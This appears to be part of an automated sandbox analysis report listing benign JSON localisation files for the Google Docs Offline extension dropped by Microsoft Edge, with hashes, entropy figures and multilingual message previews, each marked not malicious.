              Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):3122
              Entropy (8bit):3.891443295908904
              Encrypted:false
              SSDEEP:
              MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
              SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
              SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
              SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1880
              Entropy (8bit):4.295185867329351
              Encrypted:false
              SSDEEP:
              MD5:8E16966E815C3C274EEB8492B1EA6648
              SHA1:7482ED9F1C9FD9F6F9BA91AB15921B19F64C9687
              SHA-256:418FF53FCA505D54268413C796E4DF80E947A09F399AB222A90B81E93113D5B5
              SHA-512:85B28202E874B1CF45B37BA05B87B3D8D6FE38E89C6011C4240CF6B563EA6DA60181D712CCE20D07C364F4A266A4EC90C4934CC8B7BB2013CB3B22D755796E38
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1042
              Entropy (8bit):5.3945675025513955
              Encrypted:false
              SSDEEP:
              MD5:F3E59EEEB007144EA26306C20E04C292
              SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
              SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
              SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2535
              Entropy (8bit):3.8479764584971368
              Encrypted:false
              SSDEEP:
              MD5:E20D6C27840B406555E2F5091B118FC5
              SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
              SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
              SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1028
              Entropy (8bit):4.797571191712988
              Encrypted:false
              SSDEEP:
              MD5:970544AB4622701FFDF66DC556847652
              SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
              SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
              SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):994
              Entropy (8bit):4.700308832360794
              Encrypted:false
              SSDEEP:
              MD5:A568A58817375590007D1B8ABCAEBF82
              SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
              SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
              SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2091
              Entropy (8bit):4.358252286391144
              Encrypted:false
              SSDEEP:
              MD5:4717EFE4651F94EFF6ACB6653E868D1A
              SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
              SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
              SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2778
              Entropy (8bit):3.595196082412897
              Encrypted:false
              SSDEEP:
              MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
              SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
              SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
              SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1719
              Entropy (8bit):4.287702203591075
              Encrypted:false
              SSDEEP:
              MD5:3B98C4ED8874A160C3789FEAD5553CFA
              SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
              SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
              SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):936
              Entropy (8bit):4.457879437756106
              Encrypted:false
              SSDEEP:
              MD5:7D273824B1E22426C033FF5D8D7162B7
              SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
              SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
              SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):3830
              Entropy (8bit):3.5483353063347587
              Encrypted:false
              SSDEEP:
              MD5:342335A22F1886B8BC92008597326B24
              SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
              SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
              SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1898
              Entropy (8bit):4.187050294267571
              Encrypted:false
              SSDEEP:
              MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
              SHA1:74B6F050D918448396642765DEF1AD5390AB5282
              SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
              SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):914
              Entropy (8bit):4.513485418448461
              Encrypted:false
              SSDEEP:
              MD5:32DF72F14BE59A9BC9777113A8B21DE6
              SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
              SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
              SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):878
              Entropy (8bit):4.4541485835627475
              Encrypted:false
              SSDEEP:
              MD5:A1744B0F53CCF889955B95108367F9C8
              SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
              SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
              SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2766
              Entropy (8bit):3.839730779948262
              Encrypted:false
              SSDEEP:
              MD5:97F769F51B83D35C260D1F8CFD7990AF
              SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
              SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
              SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):978
              Entropy (8bit):4.879137540019932
              Encrypted:false
              SSDEEP:
              MD5:B8D55E4E3B9619784AECA61BA15C9C0F
              SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
              SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
              SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):907
              Entropy (8bit):4.599411354657937
              Encrypted:false
              SSDEEP:
              MD5:608551F7026E6BA8C0CF85D9AC11F8E3
              SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
              SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
              SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):914
              Entropy (8bit):4.604761241355716
              Encrypted:false
              SSDEEP:
              MD5:0963F2F3641A62A78B02825F6FA3941C
              SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
              SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
              SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):937
              Entropy (8bit):4.686555713975264
              Encrypted:false
              SSDEEP:
              MD5:BED8332AB788098D276B448EC2B33351
              SHA1:6084124A2B32F386967DA980CBE79DD86742859E
              SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
              SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
              Malicious:false
              Reputation:unknown
